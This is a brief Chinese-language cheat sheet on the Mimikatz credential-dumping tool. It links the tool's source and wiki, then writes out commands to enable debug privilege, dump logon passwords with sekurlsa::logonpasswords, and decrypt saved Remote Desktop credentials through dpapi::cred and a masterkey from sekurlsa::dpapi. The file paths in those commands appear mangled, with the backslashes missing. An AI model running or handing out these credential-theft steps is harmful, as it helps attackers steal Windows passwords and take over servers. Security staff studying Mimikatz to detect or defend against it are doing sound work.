-
Mimikatz GitHub (源码)
https://github.com/gentilkiwi/mimikatz -
Mimikatz GitHub Wiki (包含了一些说明文档)
https://github.com/gentilkiwi/mimikatz/wiki -
GentilKiwi Blog (博客里的大多数内容是用法语写的,请使用 Chrome 浏览器进行自动翻译)
http://blog.gentilkiwi.com/mimikatz -
感兴趣的两个点
-
- 提权
mimikatz privilege::debug
- 提权
-
- 获取密码原理
mimikatz sekurlsa::logonpasswords
- 获取密码原理
-
- 获取远程终端会话存储密码
// 1、获取指定用户下的远程会话凭据
mimikatz "dpapi::cred /in:C:UsersxxAppDataLocalMicrosoftCredentialsFF359429D6F19C64BA7D3E282558EEB5"
// 2、根据GUID获取对应的masterkey
mimikatz sekurlsa::dpapi
// 3、注入 masterkey解密
mimikatz "dpapi::cred /in:C:UsersxxAppDataLocalMicrosoftCredentialsFF359429D6F19C64BA7D3E282558EEB5 /masterkey:28d1f3252c019f9cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx16dcec8e5dbf5cd0"
- 获取远程终端会话存储密码
-
参考
Password Storage Locations For Popular Windows Applications
http://www.nirsoft.net/articles/saved_password_location.html
【奇技淫巧】破解远程终端凭据,获取服务器密码